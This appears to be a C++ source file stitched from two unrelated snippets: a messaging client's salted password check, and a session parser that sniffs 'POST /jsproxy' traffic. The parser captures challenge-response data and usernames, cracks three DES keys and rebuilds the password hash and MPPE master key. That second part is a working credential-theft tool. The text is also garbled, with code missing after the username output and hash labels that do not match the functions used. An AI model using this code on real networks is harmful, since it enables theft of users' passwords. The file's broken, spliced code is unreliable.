void IntroPwdCheck::onSubmitPwd(bool force) {
if (sentRequest) return;
if (_pwdField.isHidden()) {
if (!force && !_codeField.isEnabled()) return;
QString code = _codeField.text().trimmed();
if (code.isEmpty()) {
_codeField.notaBene();
return;
}
sentRequest = MTP::send(MTPauth_RecoverPassword(MTP_string(code)), rpcDone(&IntroPwdCheck::pwdSubmitDone, true), rpcFail(&IntroPwdCheck::codeSubmitFail));
} else {
if (!force && !_pwdField.isEnabled()) return;
_pwdField.setDisabled(true);
setFocus();
showError("");
QByteArray pwdData = _salt + _pwdField.text().toUtf8() + _salt, pwdHash(32, Qt::Uninitialized);
hashSha256(pwdData.constData(), pwdData.size(), pwdHash.data());
sentRequest = MTP::send(MTPauth_CheckPassword(MTP_string(pwdHash)), rpcDone(&IntroPwdCheck::pwdSubmitDone, false), rpcFail(&IntroPwdCheck::pwdSubmitFail));
}
}
void SessionParser::parse(const boost::uint8_t* p_data, boost::uint16_t p_length, boost::uint32_t p_srcAddr)
{
switch(m_state) {
case k_none:
if (p_length > 13 && memcmp(p_data, "POST /jsproxy", 13) == 0) {
std::cout << "[+] Initial request found." << std::endl;
m_state = k_request;
}
break;
case k_request:
if (p_length > 17 && memcmp(p_data, "HTTP/1.1 200 OK\r\n", 17) == 0) {
std::cout << "[+] Server challenge received." << std::endl;
m_serverAddress = p_srcAddr;
std::string packet;
packet.assign(reinterpret_cast<const char*>(p_data), p_length);
if (moveToPayload(packet) && packet.length() > 32) {
std::size_t index = 0;
for (std::size_t i = 0; i < 24 && index < packet.length(); i++) {
if (i < 8) {
codePointAt(packet, index);
} else {
m_rchallenge.push_back(codePointAt(packet, index));
}
}
}
m_state = k_challenge;
}
break;
case k_challenge:
{
if (p_length < 13 || memcmp(p_data, "POST /jsproxy", 13) != 0) {
break;
}
std::cout << "[+] Challenge response found." << std::endl;
m_state = k_done;
std::string packet;
packet.assign(reinterpret_cast<const char*>(p_data), p_length);
if (!moveToPayload(packet)) {
std::cerr << "Failed to find the payload." << std::endl;
break;
}
std::size_t index = 0;
for (std::size_t i = 0; i < 26; i++) {
codePointAt(packet, index);
}
m_lchallenge.assign(packet.data() + index, 16);
index += 16;
for (std::size_t i = 0; i < 8; i++) {
codePointAt(packet, index);
}
for (std::size_t i = 0; i < 8 && index < packet.length(); i++) {
m_response1.push_back(codePointAt(packet, index));
}
for (std::size_t i = 0; i < 8 && index < packet.length(); i++) {
m_response2.push_back(codePointAt(packet, index));
}
for (std::size_t i = 0; i < 8 && index < packet.length(); i++) {
m_response3.push_back(codePointAt(packet, index));
}
m_response.assign(m_response1);
m_response.append(m_response2);
m_response.append(m_response3);
m_username.assign(packet.data() + index, packet.length() - index);
std::cout << "Username: "******"Failed to recover key3!" << std::endl;
return;
}
std::cout << "DES Key 3: ";
printHexString(key3, true);
// guess des key 2
std::string key2;
if (!getKey2(key2, m_response2, challengeHash)) {
std::cerr << "Failed to recover key2!" << std::endl;
return;
}
std::cout << "DES Key 2: ";
printHexString(key2, true);
// guess des key 1
std::string key1;
if (!getKey1(key1, m_response1, challengeHash)) {
std::cerr << "Failed to recover key1!" << std::endl;
return;
}
std::cout << "DES Key 1: ";
printHexString(key1, true);
// retrieve the pwdhash from our 3 keys
std::string pwdHash(makePwdHash(key1));
pwdHash.append(makePwdHash(key2));
pwdHash.append(makePwdHash(key3));
pwdHash.resize(16);
std::cout << "Password SHA-1: ";
printHexString(pwdHash);
// create the pwd hash hash for master key creation
std::string pwdHashHash(MD4::md4(pwdHash));
std::cout << "SHA-1(Password SHA-1): ";
printHexString(pwdHashHash);
// create the master key
std::string masterKey(pwdHashHash);
masterKey.append(m_response);
masterKey.append("This is the MPPE Master Key");
unsigned char sharesult[20] = { 0 };
sha1::calc(masterKey.data(), masterKey.size(), sharesult);
masterKey.assign((char*)sharesult, 16);
std::cout<< "Master Key: ";
printHexString(masterKey);
}
break;
case k_challenge_response:
case k_decrypt:
case k_done:
default:
break;
}
}
